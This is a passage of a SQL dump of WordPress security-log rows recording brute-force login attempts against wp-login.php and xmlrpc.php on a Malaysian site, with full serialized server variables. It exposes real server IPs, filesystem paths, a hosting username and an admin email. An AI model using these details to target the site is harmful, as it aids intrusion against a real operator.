14:02:36',18254976,19552744,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.155.15'),(23869,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"38952\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5EeuoTLkHKFi2qF7E32AAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568556154.3025\";s:12:\"REQUEST_TIME\";s:10:\"1568556154\";}}','notice','2019-09-15 14:02:35','2019-09-15 14:02:34',17738448,19229744,'https://bintara.com.my/wp-login.php',1,0,'128.199.155.15'),(23868,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"64019\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5Bj@oTLkHKFi2qF7E1zwAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568555407.1953\";s:12:\"REQUEST_TIME\";s:10:\"1568555407\";}}','notice','2019-09-15 13:50:08','2019-09-15 13:50:07',18254816,19553920,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(23867,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"63009\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5Bi@oTLkHKFi2qF7E1zQAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568555403.4132\";s:12:\"REQUEST_TIME\";s:10:\"1568555403\";}}','notice','2019-09-15 13:50:04','2019-09-15 13:50:03',17738568,19228368,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(23866,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"51442\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX48FeoTLkHKFi2qF7Ex6AAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568554006.0135\";s:12:\"REQUEST_TIME\";s:10:\"1568554006\";}}','notice','2019-09-15 13:26:47','2019-09-15 13:26:46',18254624,19551592,'https://bintara.com.my/xmlrpc.php',1,0,'51.77.64.186'),(23865,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"51008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX48E2CCaIOMm5l5jJEa4gAAAQs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568554003.17\";s:12:\"REQUEST_TIME\";s:10:\"1568554003\";}}','notice','2019-09-15 13:26:44','2019-09-15 13:26:43',17736392,19227992,'https://bintara.com.my/wp-login.php',1,0,'51.77.64.186'),(23864,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"34432\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX45fOesTgPVjZVPWmsWrgAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568553340.095\";s:12:\"REQUEST_TIME\";s:10:\"1568553340\";}}','notice','2019-09-15 13:15:41','2019-09-15 13:15:40',18254856,19554440,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.173.177'),(23863,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"33906\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX45eeoTLkHKFi2qF7EwGQAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568553337.2266\";s:12:\"REQUEST_TIME\";s:10:\"1568553337\";}}','notice','2019-09-15 13:15:38','2019-09-15 13:15:37',17738384,19229680,'https://bintara.com.my/wp-login.php',1,0,'68.183.173.177'),(23862,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"47140\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX42t@oTLkHKFi2qF7EtzgAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568552631.2865\";s:12:\"REQUEST_TIME\";s:10:\"1568552631\";}}','notice','2019-09-15 13:03:52','2019-09-15 13:03:51',18254856,19554440,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.155.15'),(23861,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"46140\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX42r@esTgPVjZVPWmsWBAAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568552624.001\";s:12:\"REQUEST_TIME\";s:10:\"1568552624\";}}','notice','2019-09-15 13:03:45','2019-09-15 